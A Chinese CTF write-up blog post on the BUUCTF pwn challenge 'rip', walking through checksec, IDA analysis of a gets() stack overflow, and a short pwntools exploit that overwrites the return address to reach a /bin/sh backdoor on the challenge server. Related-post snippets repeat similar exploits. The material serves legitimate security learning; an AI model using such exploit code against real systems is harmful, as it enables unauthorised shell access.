BUUCTF--pwn基础题 rip

最新推荐文章于 2025-03-13 21:17:08 发布
最新推荐文章于 2025-03-13 21:17:08 发布
阅读量489 收藏 18
点赞数 15
文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88083440/article/details/145311615
版权

借助这篇wp学习一下关于pwn的知识,以前对于pwn总是半知半解(其实并不了解多少),希望通过这篇文章我能理解得更深刻一些。这部分可能要学久一些,因为会辅助另一篇文章(学习pwn的一些题型——格式化字符串等)

一、看基本信息

首先将文件下载到Ubuntu上,右键复制下载链接:

wget https://files.buuoj.cn/files/96928d9cad0663625615b96e2970a30f/pwn1

使用checksec 看一下该文件的基本信息

root@ch-VMware-Virtual-Platform:/home/ch/桌面/test_pwn# checksec pwn1
[*] '/home/ch/桌面/test_pwn/pwn1'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

这里的基本内容再回顾一下:
1. Arch :表示程序的架构信息,这里表明程序是由64位的AMD处理器编译的,然后是小端序

2.大端序/小端序:为了不搞混举个简单的“不完全正确的”例子: 十进制数1234

        这里的高位依次是 1(千) 2(百) 3 4。对于小端序而言,是将低位存入低地址,相当于从右往左存:低地址 4|3|2|1 高地址;而对于大端序而言,是将高位存入低地址,相当于从左往右存: 低地址 1|2|3|4 高地址

        所以就有大端序是高位字节存于低位地址,小端序是低位字节存于低位地址

3.RELRO:read-only 一种内存保护机制

4.Stack: 栈保护机制,这道题并没有发现 / 在下面发现可在栈上执行恶意代码

5.NX: 防止代码执行的保护机制,这里并没有开启

6.PIE:随机一些内存地址进行保护

7.RWX: 读 写 执行

二、IDA查看

将文件拖入IDA中,先按F5转换成伪代码(但有时候也需要能看懂汇编代码),再按 shift+F12 来跳转到字符串窗口

找到了后门 ,再回去看一下伪代码

看到这里有 gets函数,可以作为我们的"偏移函数"

gets函数不会检查目标缓冲区的大小。如果用户输入的字符串长度超过了目标缓冲区的容量,gets函数会继续将数据写入到缓冲区后面的内存空间,从而导致缓冲区溢出。

我们又通过前面的checksec中的AMD64知道这个程序的rbp(这里我个人理解是将它称为栈帧指针)为8个字节大小,并且很明显,这里的s数组占了15个字节长度

所以我们现在要做的就是,找到 /bin/sh 的地址,通过gets先把缓冲区的s数组给覆盖掉,再将rbp给覆盖掉,然后填上我们找到的地址,就能成功造成返回地址劫持了

看看/bin/sh在哪,最终在fun函数内找到了

看看地址,调到fun函数,然后按空格查看

成功得到地址0x401186

三、编写exp

直接放exp了,这里我是在主机pycharm上运行的exp

from pwn import *


p=remote('node5.buuoj.cn',25276)
payload=b'a'*23 +p64(0x401186+1)
# 这里的0x401186是为了维持堆栈平衡
p.sendline(payload)
p.interactive()

这里我看有别的师傅payload为下面这个也行:

payload=b'a'*15+p64(0x401186)

然后运行找到flag:

 成功读到flag

 

总结:
关于pwn这块很多知识点我前期并不是搞得很明白,包括这篇也搜了很多问题,不过所幸这次也算解决了很多之前困扰我很久的问题(也包括pwntools的安装-_-|)

希望这里的知识点我能记下来,如果有问题的地方欢迎各位师傅指正!

c30%00
关注
BUUCTF-PWN日记(一)
weixin_45461609的博客
04-30 1558
BUUCTF-PWN日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF-Pwn-rip
餐桌上的猫
11-14 2945
目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5989
BUU CTF PWN 入门知识详解
BUU pwn rip BUU pwn test_your_nc
最新发布
A_fish_like_sing的博客
03-13 2113
这段代码包含一个经典的缓冲区溢出漏洞。攻击者可以利用。
pwn基础入门-buuctf-2.rip
weixin_49765221的博客
05-21 1478
将下载下来的pwn1文件内容,放到ubuntu中checksec一下。
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 797
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF Pwn rip
weixin_41557838的博客
05-27 428
BUUCTF Pwn rip
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1291
BUUCTF——rip 目地址:https://buuoj.cn/challenges 目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF pwn rip
weixin_55190422的博客
11-03 428
现在开始是记录我个人对BUU上PWN的刷记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
【CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1516
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTF比赛PWNsgtlibc通用快速解框架
serfend's blog
07-07 1811
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn框架例buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例buuctf pwnable_orw libc-leak_x86_puts 例:ctfshow ret2libc_64 内部赛_签到 libc-leak_x86_write_pure 例:buuctf jarvisoj_level1 libc-leak_x86_writ
buuctf pwn详细
02-26
### 关于BUUCTF PWN目的解法与教程 #### 环境搭建 为了顺利解决BUUCTF中的PWN目,需先构建适合的实验环境。具体方法可参照相关资料[^1]。 #### 目分析与解法实例 ##### 基础概念理解 针对`rip1`这类基础...
关于沙箱关闭execve的绕过技巧及SROP的简单利用方法 --buuctf[V&N2020 公开赛])babybabypwn + warmup
PLpa的博客
07-05 1728
前言 最近做buuctf又发现一种以前没有见过的沙箱关闭execve的目,在网上找了很多资料,终于初步了解了一些简单的绕过技巧,故写此博客记录一下。 [V&N2020 公开赛]babybabypwn 查看保护 保护全开的64位Linux程序。 IDA查看伪代码 直接进入main函数看看,发现syscall函数,并不是很了解这个函数,但是通过百度我们知道syscall的几个参数的意义。 第一个参数表示syscall调用的函数,例如目中的15调用的就是sigreturn。 看到sigreturn
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 2834
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1698
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
BUUCTF-PWN详解(nc&rip
2302_80325559的博客
11-25 1498
这是C语言调用gets函数的过程绿色的直到return都是main函数的栈帧,下面的当然是gets函数。PWN目涉及的知识太多了一篇文章讲不完,这次的知识都是恰好足以解决这两道目的,如果展开首先我也说不太清楚(菜鸡哭哭 (╥﹏╥)),其次新手也听的吃力。IDA已经告诉我们s距离ebp的位置(此时ebp指向%ebp in caller)我们要填充15(Fh的十进制是15)个垃圾数据到达ebp然后再填充8个垃圾数据(ebp占8个字节)之后的数据就到了我们的return中。那不就意味着我们获得了权限。
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1625
⭐ 【buuctfpwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
BUUCTF pwn rip
Cfoxer的博客
02-15 325
计算覆盖位数,因为get内容为s所以此处应该为s位数15(0xf-0x0),加上rbp(栈底指针寄存器)大小8位,一共为23位。直接得到思路,栈溢出覆盖rip,使返回地址变成fun函数的地址,执行systen(/bin/sh),getshell。查看main函数发现危险函数gets推断为栈溢出漏洞。发现文件为64位elf可执行文件。发现并没有开启任何的保护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值